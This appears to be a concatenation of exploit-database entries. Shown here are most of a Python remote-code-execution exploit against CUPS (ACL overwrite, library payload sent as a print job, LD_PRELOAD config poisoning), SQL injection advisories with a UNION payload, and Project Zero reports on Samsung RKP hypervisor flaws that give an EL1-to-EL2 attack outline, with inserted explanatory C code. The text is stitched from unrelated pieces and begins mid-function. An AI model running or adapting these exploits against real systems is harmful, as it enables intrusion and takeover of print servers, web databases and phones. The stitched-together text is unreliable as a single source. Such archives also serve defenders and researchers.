                         "\x21"+"\x00\x06"+"copies"+"\x00\x04"+"\x00\x00\x00\x01"
                         "\x23"+"\x00\x0a"+"finishings"+"\x00\x04"+"\x00\x00\x00\x03"
                         "\x42"+"\x00\x10"+"job-cancel-after"+"\x00\x05"+"\x31\x30\x38\x30\x30"
                         "\x44"+"\x00\x0e"+"job-hold-until"+"\x00\x0a"+"indefinite"
                         "\x21"+"\x00\x0c"+"job-priority"+"\x00\x04"+"\x00\x00\x00\x32"
                         "\x42"+"\x00\x0a"+"job-sheets"+"\x00\x04"+"none"+"\x42"+"\x00\x00\x00\x04"+"none"
                         "\x21"+"\x00\x09"+"number-up"+"\x00\x04"+"\x00\x00\x00\x01"
                         "\x03")
    pretty("*","Sending createJob")

    http_header1 = ( "POST " + printer + " HTTP/1.1\x0d\x0a"
                        "Content-Type: application/ipp\x0d\x0a"
                        "Host: " + rhost + ":" + str(rport) + "\x0d\x0a"
                        "User-Agent: CUPS/2.0.2\x0d\x0a"
                        "Connection: Close\x0d\x0a"
                        "Content-Length: " + str(len(create_job_packet) + 0) + "\x0d\x0a"
                        "\x0d\x0a")

    createJobRequest = http_header1 + create_job_packet
    blah = txrx(rhost,int(rport),"tcp",createJobRequest)
    if blah is not None:
        m = re.search("ipp://" + rhost + ":" + str(rport) + "/jobs/(\d+)",blah)
        if m is not None:
            jobid = m.group(1)
    else:
        pretty("-","something went wrong");
        exit()

    pretty("*","\n" + createDump(blah) + "\n")
    pretty("*", "Sending sendJob")

    send_document_packet = ("\x02\x00"
                            "\x00\x06"+
                            reqid2+
                            "\x01"
                            "\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8"
                            "\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us"
                            "\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri +
                            "\x21"+"\x00\x06"+"job-id"+"\x00\x04"+ str(pack(">i", int(jobid))) +
                            "\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root"
                            "\x42"+"\x00\x0d"+"document-name"+"\x00\x06"+"badlib"
                            "\x49"+"\x00\x0f"+"document-format"+"\x00\x18"+"application/octet-stream"
                            "\x22"+"\x00\x0d"+"last-document"+"\x00\x01"+"\x01"
                            "\x03"+
                            payload)

    http_header2 = ( "POST " + printer + " HTTP/1.1\x0d\x0a"
                        "Content-Type: application/ipp\x0d\x0a"
                        "Host: " + rhost + ":" + str(rport) + "\x0d\x0a"
                        "User-Agent: CUPS/2.0.2\x0d\x0a"
                        "Connection: Close\x0d\x0a"
                        "Content-Length: " + str(len(send_document_packet) + 0) + "\x0d\x0a"
                        "\x0d\x0a")

    sendJobRequest = http_header2 + send_document_packet
    blah2 = txrx(rhost,int(rport),"tcp",sendJobRequest)
    pretty("*","\n" + createDump(blah) + "\n")
    pretty("*","job id: " + jobid)
    return jobid

def stompACL(rhost, rport, printer):
    i = random.randint(1,1024)
    printer_url = "ipp://" + rhost + ":" + rport + printer

    admin_stomp = ("\x02\x00"      #   vers 2.0
                "\x00\x05"+     #   op id: Create Job (0x0005)
                str(pack(">i",(i+1)))+
                "\x01"      #   op attributes marker
                "\x47"      #   charset
                "\x00\x12"      #   name len: 18
                "attributes-charset"
                "\x00\x08"      #   val len: 8
                "us-ascii"
                "\x48"      #   natural language
                "\x00\x1b"      #   name len: 27
                "attributes-natural-language"
                "\x00\x06"      #   val len: 6
                "/admin"
                "\x45"      #   printer-uri
                "\x00\x0b"      #   name len 11
                "printer-uri" +
                str(pack(">h", len(printer_url))) + printer_url +
                "\x42"      #   name without lang
                "\x00\x14"      #   name len: 20
                "requesting-user-name"
                "\x00\x06"      #   val len: 6
                "/admin"
                "\x02"      #   job attrs marker
                "\x21"      #   integer
                "\x00\x06"      #   name len: 6
                "copies"
                "\x00\x04"      #   val len: 4
                "\x00\x00\x00\x01"  #   1
                "\x42"      #   name w/o lang
                "\x00\x19"      #   name len: 25
                "job-originating-host-name"
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x36"      #   nwl
                "\x00\x00"      #   name len: 0
                "\x00\x16"      #   val len: 22
                "\x00\x06"      #   length
                "/admin"
                "\x00\x0c"
                "BBBBBBBBBBBB"
                "\x03")      #   end of attributes

    conf_stomp = ("\x02\x00"        #   vers 2.0
                "\x00\x05"+     #   op id: Create Job (0x0005)
                str(pack(">i",(i+2)))+
                "\x01"      #   op attributes marker
                "\x47"      #   charset
                "\x00\x12"      #   name len: 18
                "attributes-charset"
                "\x00\x08"      #   val len: 8
                "us-ascii"
                "\x48"      #   natural language
                "\x00\x1b"      #   name len: 27
                "attributes-natural-language"
                "\x00\x0b"      #   val len: 11
                "/admin/conf"
                "\x45"      #   printer-uri
                "\x00\x0b"      #   name len 11
                "printer-uri" +
                str(pack(">h", len(printer_url))) + printer_url +
                "\x42"      #   name without lang
                "\x00\x14"      #   name len: 20
                "requesting-user-name"
                "\x00\x0b"      #   val len: 11
                "/admin/conf"
                "\x02"      #   job attrs marker
                "\x21"      #   integer
                "\x00\x06"      #   name len: 6
                "copies"
                "\x00\x04"      #   val len: 4
                "\x00\x00\x00\x01"  #   1
                "\x42"      #   name w/o lang
                "\x00\x19"      #   name len: 25
                "job-originating-host-name"
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x42"      #   nwol
                "\x00\x00"      #   name len: 0
                "\x00\x0c"      #   val len: 12
                "AAAAAAAAAAAA"
                "\x36"      #   nwl
                "\x00\x00"      #   name len: 0
                "\x00\x1b"      #   val len: 27
                "\x00\x0b"      #   length
                "/admin/conf"
                "\x00\x0c"
                "BBBBBBBBBBBB"
                "\x03")      #   end of attributes

    http_header1 = ("POST " + printer + " HTTP/1.1\x0d\x0a"
                    "Content-Type: application/ipp\x0d\x0a"
                    "Host: " + rhost + ":" + rport + "\x0d\x0a"
                    "User-Agent: CUPS/2.0.2\x0d\x0a"
                    "Connection: Close\x0d\x0a"
                    "Content-Length: " + str(len(admin_stomp)) + "\x0d\x0a"
                    "\x0d\x0a")

    http_header2 = ("POST " + printer + " HTTP/1.1\x0d\x0a"
                    "Content-Type: application/ipp\x0d\x0a"
                    "Host: " + rhost + ":" + rport + "\x0d\x0a"
                    "User-Agent: CUPS/2.0.2\x0d\x0a"
                    "Connection: Close\x0d\x0a"
                    "Content-Length: " + str(len(conf_stomp)) + "\x0d\x0a"
                    "\x0d\x0a")

    pretty("*","stomping ACL")
    pretty("*",">:\n" + createDump(http_header1 + admin_stomp))
    pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header1 + admin_stomp)))
    time.sleep(1)
    pretty("*",">:\n" + createDump(http_header2 + conf_stomp))
    pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header2 + conf_stomp)))

    http_header_check = ("GET /admin HTTP/1.1\x0d\x0a"
                        "Host: " + rhost + ":" + rport + "\x0d\x0a"
                        "User-Agent: CUPS/2.0.2\x0d\x0a"
                        "Connection: Close\x0d\x0a"
                        "\x0d\x0a")
    pretty("*","checking /admin")
    pretty("*",">:\n" + createDump(http_header_check))
    res = txrx(rhost,rport,"tcp",http_header_check)
    pretty("*","<:\n" + createDump(res))
    m = re.search('200 OK', res)
    if m is not None:
        pretty("+","ACL stomp successful")
    else:
        pretty("-","exploit failed")
        exit(1)


def getConfig(rhost, rport):
    i = random.randint(1,1024)
    original_config = ""
    http_request = ("GET /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a"
                    "Host: " + rhost + ":" + rport + "\x0d\x0a"
                    "User-Agent: CUPS/2.0.2\x0d\x0a"
                    "Connection: Close\x0d\x0a"
                    "\x0d\x0a")

    pretty("*","grabbing configuration file....")
    res = txrx(rhost,rport,"tcp",http_request)
    res_array = res.split("\x0d\x0a\x0d\x0a")
    original_config = res_array[1]
    pretty("*","config:\n" + original_config + "\n")
    return original_config

def putConfig(rhost, rport, config):
    http_request = ("PUT /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a"
                    "Content-Type: application/ipp\x0d\x0a"
                    "Host: " + rhost + ":" + rport + "\x0d\x0a"
                    "User-Agent: CUPS/2.0.2\x0d\x0a"
                    "Connection: Keep-Alive\x0d\x0a"
                    "Content-Length: " + str(len(config)) + "\x0d\x0a"
                    "\x0d\x0a")
    pretty("*","overwriting config...")
    pretty("*",">:\n" + createDump(http_request + config))
    pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_request + config)))

def poisonConfig(config, name):
    config = config + "\x0a\x0aSetEnv LD_PRELOAD /var/spool/cups/d000" + name + "-001\x0a"
    return config

def main():
    rhost = None;
    rport = None;
    noshell = None;
    options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','lib=','stomp-only','help'])
    for opt, arg in options:
        if opt in ('-h', '--help'):
            usage()
        elif opt in ('-a','--rhost'):
            rhost = arg;
        elif opt in ('-b','--rport'):
            rport = arg;
        elif opt in ('-c','--lib'):
            libpath = arg;
        elif opt in ('-f','--stomp-only'):
            noshell = 1;
    banner()
    if rhost is None or rport is None:
        usage()
    pretty("*","locate available printer")
    printer = locatePrinters(rhost, rport)
    pretty("*","stomp ACL")
    stompACL(rhost, rport, printer)
    if (noshell is not None):
        pretty("*","fin")
        exit(0)
    pretty("*","prepare payload")
    payload = preparePayload(libpath)
    pretty("*","spray payload")
    jobid = seedTarget(rhost, rport, printer, payload)
    pretty("*","grab original config")
    OG_config = getConfig(rhost, rport)
    pretty("*","generate poison config")
    evil_config = poisonConfig(OG_config, jobid)
    pretty("*","upload poison config")
    putConfig(rhost, rport, evil_config)
    pretty("*","fin")
    exit(0);

if __name__ == "__main__":
    main()
            
# # # # # 
# Exploit Title: Itech Travel Portal Script v9.35 - SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://www.itechscripts.com/travel-portal-script/
# Demo: http://travel.itechscripts.com/
# Version: 9.35
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/pages.php?id=[SQL]
# http://localhost/[PATH]/content.php?id=[SQL]
# http://localhost/[PATH]/faq_show.php?fid=[SQL]
# http://localhost/[PATH]/showCity.php?q=[SQL]
# E.t.c... E.t.c...
# # # # #
            
# # # # # 
# Exploit Title: Itech Movie Portal Script v7.37 - SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/movie-portal-script/
# Demo: http://movie-portal.itechscripts.com
# Version: 7.27
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/faq_show.php?fid=[SQL]
# http://localhost/[PATH]/cms.php?id=[SQL]
# http://localhost/[PATH]/show_news.php?id=[SQL]
# http://localhost/[PATH]/show_misc_video.php?id=[SQL]
# E.t.c... E.t.c...
# # # # #
            
# # # # # 
# Exploit Title: Itech Auction Script v6.49 – 'pid' Parameter SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/auction-script/
# Demo: http://auction.itechscripts.com/
# Version: 6.49
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/ajax-files/list_photo.php?pid=[SQL]
# E.t.c.
# # # # #
            
# # # # # 
# Exploit Title: Itech News Portal Script v6.28 - 'sc' Parameter SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/news-portal-script/
# Demo: http://news-portal.itechscripts.com/
# Version: 6.28
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/subcategory.php?sc=[SQL]
# E.t.c.
# # # # #
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=981

As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to prevent privilege escalation attacks by "shielding" certain data structures within the hypervisor.

One of the protections implemented by RKP is a security policy meant to ensure that only the "authentic" kernel code pages are executable from EL1. This mitigation is achieved by combining a few memory protection policies together, namely:
  - All pages with the exception of the kernel code are marked PXN
  - All kernel code pages are marked read-only in the stage 2 translation table
  - Kernel data pages are never marked executable
  - Kernel code pages are never marked writable
(for more information, see https://www2.samsungknox.com/en/blog/real-time-kernel-protection-rkp)

In order to explore this mitigation technique, I've written a small tool to dump the stage 1 and stage 2 translation tables for EL0/EL1.  First, the initial stage 2 translation table is embedded in the VMM code, so it can be statically retrieved and analysed. Here is a short snippet from the initial stage 2 translation table (the addresses here are PAs, although RKP implements a one-to-one PA<->IPA translation, barring memory protections):

...
0x80000000-0x80200000: S2AP=11, XN=0
0x80200000-0x80400000: S2AP=11, XN=0
0x80400000-0x80600000: S2AP=11, XN=0
0x80600000-0x80800000: S2AP=11, XN=0
0x80800000-0x80a00000: S2AP=11, XN=0
0x80a00000-0x80c00000: S2AP=11, XN=0
0x80c00000-0x80e00000: S2AP=11, XN=0
0x80e00000-0x81000000: S2AP=11, XN=0
0x81000000-0x81200000: S2AP=11, XN=0
0x81200000-0x81400000: S2AP=11, XN=0
0x81400000-0x81600000: S2AP=11, XN=0
...

The physical address range above corresponds with the physical address range in which the kernel code is located. As can be seen above, this entire address range is mapped as RWX in the initial stage 2. However, obviously RKP does not leave this area unprotected, as this might allow an attacker to subvert the kernel's integrity (by writing to the kernel's code pages). When RKP is initialized (i.e., when the HVC command RKP_INIT is called from EL1), the HLOS kernel passes a structure containing the address ranges for the currently loaded kernel. Here is a short snippet from "rkp_init" (init/main.c):

static void rkp_init(void)
{
    rkp_init_t init;
    init.magic = RKP_INIT_MAGIC;
    init.vmalloc_start = VMALLOC_START;
    init.vmalloc_end = (u64)high_memory;
    init.init_mm_pgd = (u64)__pa(swapper_pg_dir);
    init.id_map_pgd = (u64)__pa(idmap_pg_dir);
    init.rkp_pgt_bitmap = (u64)__pa(rkp_pgt_bitmap);
    init.rkp_map_bitmap = (u64)__pa(rkp_map_bitmap);
    init.rkp_pgt_bitmap_size = RKP_PGT_BITMAP_LEN;
    init.zero_pg_addr = page_to_phys(empty_zero_page);
    init._text = (u64) _text;
    init._etext = (u64) _etext;
    if (!vmm_extra_mem) {
        printk(KERN_ERR"Disable RKP: Failed to allocate extra mem\n");
        return;
    }
    init.extra_memory_addr = __pa(vmm_extra_mem);
    init.extra_memory_size = 0x600000;
    init._srodata = (u64) __start_rodata;
    init._erodata =(u64) __end_rodata;
    init.large_memory = rkp_support_large_memory;

    rkp_call(RKP_INIT, (u64)&init, 0, 0, 0, 0);
}

Upon receiving this command, RKP changes the stage 2 permissions for the address range corresponding to the kernel text (from "init._text" to "init._etext") to read-only and executable, like so:

...
kernel_text_phys_start = rkp_get_pa(text);
kernel_text_phys_end = rkp_get_pa(etext);
rkp_debug_log("DEFERRED INIT START", 0LL, 0LL, 0LL);
if ( etext & 0x1FFFFF )
    rkp_debug_log("Kernel range is not aligned", 0LL, 0LL, 0LL);
if ( !rkp_s2_range_change_permission(kernel_text_phys_start, kernel_text_phys_end, 128LL, 1, 1) )
    rkp_debug_log("Failed to make Kernel range RO", 0LL, 0LL, 0LL);
rkp_l1pgt_process_table(init_mm_pgd, 1u, 1u);
...

However, notice that the code above only marks the region from _text to _etext as read-only. This region is *strictly smaller* than the physical address range reserved for the kernel text region (in part in order to account for RKP's KASLR slide, which means the kernel can be placed at several offsets within this region). If we take a look at the stage 1 translation table from TTBR1_EL1, we can see that the kernel code pages are allocated using L2 block descriptors (i.e., a large granularity), like so:

...
[256] L1 table [PXNTable: 0, APTable: 0]
  [  0] 0x080000000-0x080200000 [PXN: 0, UXN: 1, AP: 0]
  [  1] 0x080200000-0x080400000 [PXN: 0, UXN: 1, AP: 0]
  [  2] 0x080400000-0x080600000 [PXN: 0, UXN: 1, AP: 0]
  [  3] 0x080600000-0x080800000 [PXN: 0, UXN: 1, AP: 0]
  [  4] 0x080800000-0x080a00000 [PXN: 0, UXN: 1, AP: 0]
  [  5] 0x080a00000-0x080c00000 [PXN: 0, UXN: 1, AP: 0]
  [  6] 0x080c00000-0x080e00000 [PXN: 0, UXN: 1, AP: 0]
  [  7] 0x080e00000-0x081000000 [PXN: 0, UXN: 1, AP: 0]
  [  8] 0x081000000-0x081200000 [PXN: 0, UXN: 1, AP: 0]
  [  9] 0x081200000-0x081400000 [PXN: 0, UXN: 1, AP: 0]
  [ 10] 0x081400000-0x081600000 [PXN: 1, UXN: 1, AP: 0]
...
          
Moreover, as we can see above, the region 0x080000000-0x081400000 is marked as RWX in the stage 1 translation table, even though the kernel code pages only take up a much smaller area within this region.

Combining these facts, we arrive at the conclusion that any address in the ranges 0x080000000-"_text" or "_etext"-0x081400000 is marked as RWX both in stage 1 and stage 2, even after RKP is initialized.

This issue can be reproduced by simply writing code to any of these memory regions in EL1 and executing it directly (e.g., writing code to address 0xffffffc000000000 in the kernel's VAS).
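
The conclusion above can be checked mechanically. The following added example (not the author's dumping tool and not RKP code) intersects the stage 1 and stage 2 permissions from the two dumps, applies the read-only change that RKP_INIT makes to [_text, _etext), and lists what stays writable and executable at EL1. It assumes the printed AP value is AP[2:1]; the physical _text/_etext values and all function names are constructed for the example, since the report does not give them.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define BLOCK_2M 0x200000ULL
#define PAGE_4K  0x1000ULL

/* One 2 MB block entry, with the fields the two dumps above print. */
struct s1_block { uint64_t start; unsigned pxn; unsigned ap; };   /* AP assumed to be AP[2:1] */
struct s2_block { uint64_t start; unsigned s2ap; unsigned xn; };
struct range    { uint64_t start, end; };                         /* [start, end) */

/* Stage 1, EL1 view: AP[2:1] = 0b0x is writable at EL1, PXN = 0 is executable at EL1. */
static int s1_el1_wx(const struct s1_block *b)
{
    return (b->ap & 2u) == 0 && b->pxn == 0;
}

/* Stage 2: S2AP bit 1 grants write access, XN = 0 allows execution. */
static int s2_wx(unsigned s2ap, unsigned xn)
{
    return (s2ap & 2u) != 0 && xn == 0;
}

/*
 * Walk n matching blocks page by page and collect every range that EL1 can
 * both write and execute once [text, etext) has been made read-only and
 * executable in stage 2. Returns the number of ranges stored in out.
 */
size_t audit_wx(const struct s1_block *s1, const struct s2_block *s2, size_t n,
                uint64_t text, uint64_t etext, struct range *out, size_t max_out)
{
    size_t count = 0;

    for (size_t i = 0; i < n; i++) {
        for (uint64_t off = 0; off < BLOCK_2M; off += PAGE_4K) {
            uint64_t pa = s1[i].start + off;
            unsigned s2ap = s2[i].s2ap, xn = s2[i].xn;

            if (pa >= text && pa < etext) {   /* effect of RKP_INIT on stage 2 */
                s2ap = 1;                     /* read-only */
                xn = 0;                       /* executable */
            }
            if (!s1_el1_wx(&s1[i]) || !s2_wx(s2ap, xn))
                continue;
            if (count > 0 && out[count - 1].end == pa) {
                out[count - 1].end = pa + PAGE_4K;   /* extend the current range */
            } else {
                if (count == max_out)
                    return count;
                out[count].start = pa;
                out[count].end = pa + PAGE_4K;
                count++;
            }
        }
    }
    return count;
}

/* Constructed values: the report does not give the physical _text/_etext. */
#define EXAMPLE_TEXT_PA  0x80080000ULL
#define EXAMPLE_ETEXT_PA 0x80e00000ULL

/* Rebuild the eleven blocks shown in the dumps and audit them. */
size_t audit_example(struct range *out, size_t max_out)
{
    struct s1_block s1[11];
    struct s2_block s2[11];

    for (size_t i = 0; i < 11; i++) {
        uint64_t start = 0x80000000ULL + i * BLOCK_2M;
        s1[i] = (struct s1_block){ start, i == 10 ? 1u : 0u, 0u };  /* entry 10 has PXN = 1 */
        s2[i] = (struct s2_block){ start, 3u, 0u };                 /* S2AP=11, XN=0 */
    }
    return audit_wx(s1, s2, 11, EXAMPLE_TEXT_PA, EXAMPLE_ETEXT_PA, out, max_out);
}

int main(void)
{
    struct range r[8];
    size_t n = audit_example(r, 8);

    for (size_t i = 0; i < n; i++)
        printf("W+X at EL1 in both stages: 0x%09llx-0x%09llx\n",
               (unsigned long long)r[i].start, (unsigned long long)r[i].end);
    return 0;
}
```

Run against real dumps, any range this reports is a W^X violation that survives RKP initialization.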


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41217.zip
            
Exploit Title: LogoStore - SQL Injection
Date: 27.01.2017
Software Link: https://codecanyon.net/item/logostore-buy-and-sell-logos-online/19379630
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits

Overview

LogoStore is a web application that allows you to buy and sell logos online. Manage logos within your account, check others' logos and sell your own!

Type of vulnerability:

An SQL Injection vulnerability in LogoStore allows attackers to read
arbitrary data from the database.

Vulnerable URL : http://locahost/LogoStore/search.php
Method : POST
Parameter : query

Simple Payload:
Type: UNION query
Payload: query=test' UNION ALL SELECT CONCAT(CONCAT('qqkkq','VnPVWVaYxljWqGpLLbEIyPIHBjjjjASQTnaqfKaV'),'qvvpq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oCrh&search=
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=979

As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to prevent privilege escalation attacks by "shielding" certain data structures within the hypervisor.

One of the features supported by RKP (but not yet supported by the Linux Kernel), is a form of control flow protection which is meant to mitigate the ROP and JOP exploitation techniques. This mitigation leverages a 64-bit key stored in the hypervisor in order to encrypt the return addresses and frame pointers stored on a given kernel task's stack.

RKP provides two commands which produce a value using the 64-bit hypervisor key, namely:
  -cfp_ropp_new_key (RKP command 0x91)
  -cfp_ropp_new_key_reenc (RKP command 0x92)

Both of these commands convert the given virtual address from the kernel VAS to a physical address, but fail to verify the resulting address either via "physmap", or by checking that the given address does not reside in the physical address range of RKP itself.

This means an attacker can issue these RKP calls in order to corrupt RKP memory or write to regions which are S2-protected by EL2 (for example, the EL0/1 translation tables).
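
The check that both commands skip, as an added example (not RKP's code): the translated physical address is refused if the write would touch the hypervisor's own range or any stage-2-protected page, including when an unaligned 8-byte write straddles a page boundary. The layout structure, the per-page bitmap standing in for "physmap", the function names and all addresses are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define PAGE_SHIFT 12
#define PAGE_SIZE  (1ULL << PAGE_SHIFT)

/* Hypothetical description of what the hypervisor must never write on EL1's behalf. */
struct hyp_layout {
    uint64_t ram_base, ram_size;   /* physical window tracked by the bitmap */
    uint64_t hyp_base, hyp_size;   /* the hypervisor's own code and data */
    uint8_t *s2_protected;         /* one bit per 4 KB page, 1 = stage-2 protected */
};

static int page_is_protected(const struct hyp_layout *l, uint64_t pa)
{
    uint64_t idx = (pa - l->ram_base) >> PAGE_SHIFT;
    return (l->s2_protected[idx / 8] >> (idx % 8)) & 1;
}

void mark_protected(struct hyp_layout *l, uint64_t pa)
{
    uint64_t idx = (pa - l->ram_base) >> PAGE_SHIFT;
    l->s2_protected[idx / 8] |= (uint8_t)(1u << (idx % 8));
}

/*
 * Decide whether the hypervisor may write len bytes at physical address pa
 * after translating an EL1-supplied virtual address. Returns 1 to allow,
 * 0 to refuse.
 */
int hyp_write_allowed(const struct hyp_layout *l, uint64_t pa, uint64_t len)
{
    if (len == 0 || pa + len < pa)                        /* empty or wrapping range */
        return 0;
    uint64_t end = pa + len;                              /* exclusive */
    if (pa < l->ram_base || end > l->ram_base + l->ram_size)
        return 0;                                         /* outside tracked RAM */
    if (pa < l->hyp_base + l->hyp_size && end > l->hyp_base)
        return 0;                                         /* overlaps the hypervisor */
    /* An unaligned write can touch two pages, so check every page it covers. */
    for (uint64_t p = pa & ~(PAGE_SIZE - 1); p < end; p += PAGE_SIZE)
        if (page_is_protected(l, p))
            return 0;
    return 1;
}

/* Constructed layout: 16 MB of RAM with the hypervisor in the last 1 MB. */
static uint8_t example_bitmap[(0x1000000ULL >> PAGE_SHIFT) / 8];

struct hyp_layout example_layout(void)
{
    struct hyp_layout l = { 0x80000000ULL, 0x1000000ULL,
                            0x80f00000ULL, 0x100000ULL, example_bitmap };

    for (size_t i = 0; i < sizeof example_bitmap; i++)
        example_bitmap[i] = 0;
    mark_protected(&l, 0x80200000ULL);   /* stands in for an EL1 translation table page */
    return l;
}

int main(void)
{
    struct hyp_layout l = example_layout();
    const uint64_t targets[] = { 0x80400000ULL, 0x801ffffcULL, 0x80effffcULL, 0x80f00010ULL };

    for (size_t i = 0; i < sizeof targets / sizeof targets[0]; i++)
        printf("8-byte write at 0x%llx: %s\n", (unsigned long long)targets[i],
               hyp_write_allowed(&l, targets[i], 8) ? "allowed" : "refused");
    return 0;
}
```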

When the aforementioned commands are executed, they read the value of the HYP-mode physical timer (CNTHP_TVAL_EL2) and then write the value (timer_value XOR 64bit_cfpropp_key) into the attacker-controlled memory location. Note that the 64-bit key is not secret, as it can be deduced by the attacker by requesting the hypervisor to "encrypt" a given 64-bit value, and then XOR-ing it back again with the original value to obtain the key. Furthermore, the key is currently not even randomly generated, but rather hard-coded into the hypervisor (the current key embedded in the hypervisor is 0xDB551FCBF3F95C53).

Here is an outline of an attack scenario in which an attacker can gain code execution within RKP (EL2) from EL1:

  1. Get code execution in EL1
  2. Locate the PTE/PMD/PGD in TTBR1_EL1 pointing to an RKP code page
  3. Call "cfp_ropp_new_key_reenc" repeatedly to modify the translation table entry's AP bits to allow it to be writable
  4. (In case the region is S2-protected, do the same for the entries in VTTBR)
  5. Write directly to RKP's code segment from EL1

Lastly, it seems as though the RKP code pages are mapped as writable in TTBR_EL2 (and TCR_EL2.WXN is not set) - allowing the attacker to use these commands (or any other RKP memory corruption) in order to directly modify RKP code.

Proof of concept for the RKP CFP_ROPP_* memory corruption issue.

This PoC uses the CFP_ROPP_* commands to modify a kernel address in the kernel VAS.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41211.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=980

As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to prevent privilege escalation attacks by "shielding" certain data structures within the hypervisor.

